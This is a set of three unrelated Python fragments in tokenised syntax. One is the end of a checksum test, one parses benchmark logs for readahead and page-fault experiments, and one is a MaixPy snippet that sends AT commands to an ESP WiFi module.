md5sum.")<block_start>test_file.refresh_item()<if_stmt>test_file_md5<ne>test_file.md5sum()<block_start>TestRun.LOGGER.error("Checksums does not match - file is corrupted.")<block_end><else_stmt><block_start>TestRun.LOGGER.info("File checksum is correct.")<block_end><block_end><with_stmt>TestRun.step("Remove test file.")<block_start>test_file.remove()<block_end><block_end>
# # Copyright (c) 2019-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2020-2021 <NAME> # Copyright (c) 2020-2021 <NAME> # Copyright (c) 2019-2021 <NAME> # Copyright (c) 2019-2021 Stony Brook University # Copyright (c) 2019-2021 The Research Foundation of SUNY # # You can redistribute it and/or modify it under the terms of the Apache License, # Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0). # <import_from_stmt>collections defaultdict<import_stmt>re<import_stmt>sys<import_stmt>os<def_stmt>find_avg_faults time_values<block_start>x=[]<line_sep>y=[]<for_stmt>vals time_values<block_start>t_delta=vals[0]<line_sep>maj_faults=vals[1]<line_sep>avg=maj_faults/t_delta<line_sep>prev=x[-1]<if>len(x)<else>0<line_sep>x.append(prev+t_delta)<line_sep>y.append(avg)<block_end><return>x y<block_end><def_stmt>avg data<block_start>total=0<for_stmt>duration,x data<block_start>total<augadd>x<block_end><return>total/len(data)<block_end><def_stmt>weighted_avg data<block_start>time=0<line_sep>total=0<for_stmt>duration,x data<block_start>time<augadd>duration<line_sep>total<augadd>duration<times>x<block_end><return>total/time<block_end><def_stmt>parse_bench_time_values values_dict fn workloads<block_start>start=re.compile(r'\tCommand being timed: "\S+ --benchmarks=(\w+)')<line_sep>elap=re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)')<line_sep>major=re.compile(r'\tMajor \(requiring I/O\) page faults: (\d+)')<line_sep>minor=re.compile(r'\tMinor \(reclaiming a frame\) page faults: (\d+)')<line_sep>inputs=re.compile(r'\tFile system inputs: (\d+)')<line_sep>outputs=re.compile(r'\tFile system outputs: (\d+)')<line_sep>end=re.compile(r'\tExit status: \d+')<with_stmt>open(fn)<as>f<block_start><for_stmt>line 
f.readlines()<block_start>match=start.match(line)<if_stmt>match<block_start>curr_workload=match.group(1)<line_sep>load_set=set(workloads)<line_sep>load_set.remove(curr_workload)<line_sep>other_workload=load_set.pop()<line_sep>workload=values_dict[(curr_workload other_workload)]<line_sep>data=[]<block_end>match=elap.match(line)<if_stmt>match<block_start>sec=60<times>int(match.group(1))<line_sep>sec<augadd>float(match.group(2))<line_sep>data.append(sec)<block_end><for_stmt>exp [major minor inputs outputs]<block_start>match=exp.match(line)<if_stmt>match<block_start>data.append(int(match.group(1)))<line_sep><break><block_end><block_end>match=end.match(line)<if_stmt>match<block_start>workload.append(data)<block_end><block_end><block_end><block_end><def_stmt>parse_bench_ops_sec values_dict fn<block_start>start=re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.* (\d+) ops/sec;\s+([0-9\.]+) MB/s')<line_sep>rwrandomstart=re.compile(r'readrandomwriterandom\s*:.* (\d+) ops/sec;')<line_sep>total_occ_dict={}<with_stmt>open(fn)<as>f<block_start>data=<none><for_stmt>line f.readlines()<block_start><if_stmt>data<eq><none><block_start>match=start.match(line)<if_stmt>match<block_start>curr_workload=match.group(1)<line_sep>ops=match.group(4)<line_sep>values_dict.setdefault(curr_workload 0)<line_sep>values_dict[curr_workload]<augadd>int(ops)<line_sep>total_occ_dict.setdefault(curr_workload 0)<line_sep>total_occ_dict[curr_workload]<augadd>1<line_sep>data=<none><block_end>match=rwrandomstart.match(line)<if_stmt>match<block_start>curr_workload='readrandomwriterandom'<line_sep>ops=match.group(1)<line_sep>values_dict.setdefault(curr_workload 0)<line_sep>values_dict[curr_workload]<augadd>int(ops)<line_sep>total_occ_dict.setdefault(curr_workload 0)<line_sep>total_occ_dict[curr_workload]<augadd>1<line_sep>data=<none><block_end><continue><block_end><block_end><block_end><for_stmt>key 
total_occ_dict.keys()<block_start>values_dict[key]<augdiv>total_occ_dict[key]<block_end><block_end><def_stmt>parse_bench_throughput values_dict fn workloads<block_start>start=re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.*;\s+([0-9\.]+) MB/s')<line_sep>rwrandomstart=re.compile(r'readrandomwriterandom\s*:.*;')<line_sep>elap=re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)')<line_sep>end=re.compile(r'\tExit status: \d+')<with_stmt>open(fn)<as>f<block_start>data=<none><for_stmt>line f.readlines()<block_start><if_stmt>data<eq><none><block_start>match=start.match(line)<if_stmt>match<block_start>curr_workload=match.group(1)<line_sep>load_set=set(workloads)<line_sep>load_set.remove(curr_workload)<line_sep>other_workload=load_set.pop()<line_sep>workload=values_dict[(curr_workload other_workload)]<line_sep>throughput=match.group(4)<line_sep>data=[0 float(throughput)]<line_sep># jk we don't need elap time and sometimes output gets intermixed workload.append(data)<line_sep>data=<none><block_end>match=rwrandomstart.match(line)<if_stmt>match<block_start>curr_workload='readrandomwriterandom'<line_sep>load_set=set(workloads)<line_sep>load_set.remove(curr_workload)<line_sep>other_workload=load_set.pop()<line_sep>workload=values_dict[(curr_workload other_workload)]<line_sep>data=[0 1]<line_sep># jk we don't need elap time and sometimes output gets intermixed workload.append(data)<line_sep>data=<none><block_end><continue><block_end>match=elap.match(line)<if_stmt>match<block_start>sec=60<times>int(match.group(1))<line_sep>sec<augadd>float(match.group(2))<line_sep>data.insert(0 sec)<line_sep><continue><block_end>match=end.match(line)<if_stmt>match<block_start>workload.append(data)<line_sep>data=<none><block_end><block_end><block_end><block_end><def_stmt>generate_combos <block_start>wkload_combos=[]<line_sep># needs to be in same order as iterated through in generate-result-*.sh <for_stmt>seq ["readseq" "readreverse"]#for rand in 
["readrandom", "readrandomwriterandom"]: #for rand in ["mixgraph"]: <block_start><for_stmt>rand ["readrandom" "readrandomwriterandom" "mixgraph"]<block_start>wkload_combos.append((seq rand))<block_end><block_end><return>wkload_combos<block_end><def_stmt>parse_detail_file dict_exp file_path<arrow>defaultdict<block_start>combos=generate_combos()<line_sep>i=0<with_stmt>open(os.path.join(os.curdir file_path))<as>f<block_start>lines=f.readlines()<line_sep>curr_exp=<none><for_stmt>line lines<block_start>values=line.split()<if_stmt>len(values)<eq>2<block_start><if_stmt>values[1]<eq>'1'<block_start>curr_exp=values[0]<while_stmt>curr_exp<not><in>combos[i]<block_start>i<augadd>1<if_stmt>i<eq>len(combos)<block_start>print(f'detail file {file_path} badly formatted')<line_sep>print(f'{curr_exp} not in combos {combos}')<line_sep>sys.exit(1)<block_end><block_end>background_exp=set(combos[i])<line_sep>background_exp.remove(curr_exp)<line_sep>background_exp=background_exp.pop()<line_sep>curr_exp=(curr_exp background_exp)<line_sep>i<augadd>1<block_end><elif_stmt>values[0]<not><in>curr_exp<block_start>print(f'detail file {file_path} badly formatted')<line_sep>sys.exit(1)<block_end><block_end><else_stmt><block_start><if_stmt>curr_exp<eq><none><block_start>print(f'detail file {file_path} badly formatted')<line_sep>sys.exit(1)<block_end>x=0<if>len(dict_exp[curr_exp])<eq>0<else>dict_exp[curr_exp][-1][0]+float(values[4])<line_sep>dict_exp[curr_exp].append([x float(values[2])])<block_end><block_end><block_end><return>dict_exp<block_end><def_stmt>parse_kern_log_file file_path<arrow>defaultdict<block_start>dict_exp=defaultdict(list)<with_stmt>open(os.path.join(os.curdir file_path))<as>f<block_start>lines=f.readlines()<for_stmt>line 
lines<block_start>values=line.split()<if_stmt>len(values)<eq>2<block_start>curr_exp=tuple(values)<block_end><elif_stmt>values[5]<eq>'readahead'<block_start>dict_exp[curr_exp].append(float(values[8]))<block_end><block_end><block_end><return>dict_exp<block_end><def_stmt>mean arr<block_start><return>sum(arr)/len(arr)<block_end>
# This file is part of MaixPY # Copyright (c) sipeed.com # # Licensed under the MIT license: # http://www.opensource.org/licenses/mit-license.php # <import_from_stmt>network_espat wifi<line_sep>wifi.reset()<line_sep>print(wifi.at_cmd("AT\r\n"))<line_sep>print(wifi.at_cmd("AT+GMR\r\n"))<line_sep>''' >>> reset... b'\r\n\r\nOK\r\n' b'AT version:1.1.0.0(May 11 2016 18:09:56)\r\nSDK version:1.5.4(baaeaebb)\r\ncompile time:May 20 2016 15:06:44\r\nOK\r\n' MicroPython v0.5.1-136-g039f72b6c-dirty on 2020-11-18; Sipeed_M1 with kendryte-k210 Type "help()" for more information. >>> '''<line_sep>